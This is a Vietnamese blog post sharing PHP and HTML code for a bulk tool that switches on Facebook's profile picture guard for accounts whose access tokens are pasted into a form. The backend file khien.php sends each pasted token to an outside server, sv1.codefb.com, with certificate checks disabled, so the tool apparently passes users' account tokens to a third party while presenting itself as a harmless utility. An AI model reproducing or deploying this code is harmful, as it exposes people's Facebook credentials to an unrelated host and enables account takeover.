Tiếp tục chia sẻ từng bước cách tạo ra tool bật khiên facebook số lượng cực lớn


Posted on 06-07-2018, in Categories: done, Share-code,


Đầu tiên và cuối cùng thì mấy code bật khiên thực chất đã được share rất nhiều rồi nhưng nay rảnh share lại code làm số lượng cực lớn chứ không chơi từng cái cho mất tính chuyên nghiệp nha :))

Để có thể chạy code bạn cần 1 nơi lưu trữ code có thể dùng localhost hoặc lượm cái hosting free nào đấy dành cho mấy bạn theo chủ nghĩa hàng free chất lượng cao nhé !

Có đủ hết rồi thì ta bắt đầu thôi: ảnh demo

Bước 1: Tạo file với tên tùy ý bạn muốn, mình thì thích cái tên đầu tiên luôn là app.php nhưng giờ viết index.php cho dễ nhìn rồi dán cái code củ chuối này vào :

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
        <title>TOOL Bật Khiên SỐ LƯỢNG CỰC LỚN</title>
        <meta name="description" content="Tangsubs - Hệ thống VIP Facebook Việt Nam" />
        <link href="./bootstrap.css" rel="stylesheet">
                <link href="./style.css" rel="stylesheet" type="text/css"/>
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

        <link rel="icon" href="https://www.facebook.com/images/fb_icon_325x325.png" />
    <script>
      $.widget.bridge('uibutton', $.ui.button);
    </script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.js"></script>

    </head>
<div class="content-wrapper">
<div class="banner">
            <div class="container">
            <center>
            <iframe width="560" height="315" src="https://www.youtube.com/embed/94KakBORfbo" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
</center>
                <h1 class="banner-title-main" > TOOL Bật Khiên SỐ LƯỢNG CỰC LỚN  <span style="color: #eb6d6d;"></span></h1>
                <p class="banner-title-paragraph">AUTO BẬT KHIÊN BẰNG TOKEN - 2018 - <b>Ẩn Danh</b><br>
                </p>
                <br>

            </div>
<div class="panel panel-primary">
<div class="panel-heading">
    <h3 class="panel-title">Panel BẬT KHIÊN</h3>
</div>        
    <div class="panel-body">
            <div class="form-group">
                <label for="">List token: (Định dạng: EAAA)</label>  <span id="danhap"></span>
                <textarea class="form-control" rows="10" name="cookie" id="cookie" placeholder="Nhập TOKEN của nick muốn BẬT KHIÊN"></textarea>
            </div>
<button type="submit" onclick="check();" class="btn btn-block btn-success">Start Tool</button>
    </div>
</div>
<div class="panel panel-primary">
<div class="panel-heading">
    <h3 class="panel-title">Kết Quả - <font color="blue" id="num_live">0</font> Đã upload thành công và <font color="red" id="num_die">0</font> Đã upload thất bại. </h3>
</div>        
    <div class="panel-body">
            <div class="form-group">
                <span id="lang_report"></span>
            </div>
    </div>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-1.10.2.js"></script>
<script>
$("#link").keyup(function() {
    $("#danhap").text($.trim($("#link").val()).split("\n").length)
});
function check() {
 input = $.trim($("#cookie").val()).split("\n");
 height = $.trim($("#height").val());
 width = $.trim($("#width").val());
   for (var a = 0; a < input.length; a++) {
        $("#lang_report").html('Đang tiến hành ... : '+input[a]);
        check_token(input[a])
    }
}
function check_token(a) {
    $.get("khien.php",
        {
          cookie: a,
          height: height,
          width: width
        },
        function(html){
        
        if(html != 'ERROR'){
        $("#num_live").text(parseInt($("#num_live").text()) + 1);
        $("#lang_report").html(html);
        }else{
            $("#num_die").text(parseInt($("#num_die").text()) + 1);
           $("#lang_report").html(html); 
        }
        });
};
</script>
    <!-- Bootstrap JavaScript -->
    <script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>

 

Bước 2: Tạo file tên khien.php ngang hàng với file lúc nảy nhé rồi dán code cùi này vào :D 

<?php 
session_start();
date_default_timezone_set("Asia/Ho_Chi_Minh"); 
extract($_GET);
$locacc = explode("|", $_GET['cookie']);
$cookie = $locacc['0'];
if($cookie){
request('http://sv1.codefb.com/chucnangnuoi/jonkhien.php?token='.$cookie);
echo 'Thành Công';
}
function request($url)
{
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        return FALSE;
    }
    
    $options = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => TRUE,
        CURLOPT_HEADER => FALSE,
        CURLOPT_FOLLOWLOCATION => TRUE,
        CURLOPT_ENCODING => '',
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36',
        CURLOPT_AUTOREFERER => TRUE,
        CURLOPT_CONNECTTIMEOUT => 15,
        CURLOPT_TIMEOUT => 15,
        CURLOPT_MAXREDIRS => 5,
        CURLOPT_SSL_VERIFYHOST => 2,
        CURLOPT_SSL_VERIFYPEER => 0
    );
    $ch = curl_init();
    curl_setopt_array($ch, $options);
    $response  = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    unset($options);
    return $http_code === 200 ? $response : FALSE;
}
function get($url){
   $curl = curl_init();
   curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
   curl_setopt($curl, CURLOPT_URL, $url);
   $ch = curl_exec($curl);
   curl_close($curl);
   return $ch;
   }
   ?> 

Vậy là xong code đơn giản quá phải không nào. Thật ra thì còn cái cuối chính là file code đã dược share nhiều trên mạng rồi các bạn tự tìm vào thay link vào nhé hoặc cần thì mình share luôn, =))~

Cám ơn các bạn đã dành thời gian ra copy và đọc bài viết này ! 

Video cách chạy cho bạn nào cần thêm thông tin nhé :

 

 


Tags: khien facebook, huong dan code,

admin

"Tôi không phải là dân lập trình chuyên nghiệp bởi kinh nghiệm mà tôi có được không nhiều, hầu hết các code mà tôi đã từng edit code cũng không là bao, tôi nhận thấy mình chỉ là một người yêu thích lập trình và chia sẻ mà thôi..."


Về Tôi

ĐĂNG KÝ NHẬN TIN QUA EMAIL

Social Media Network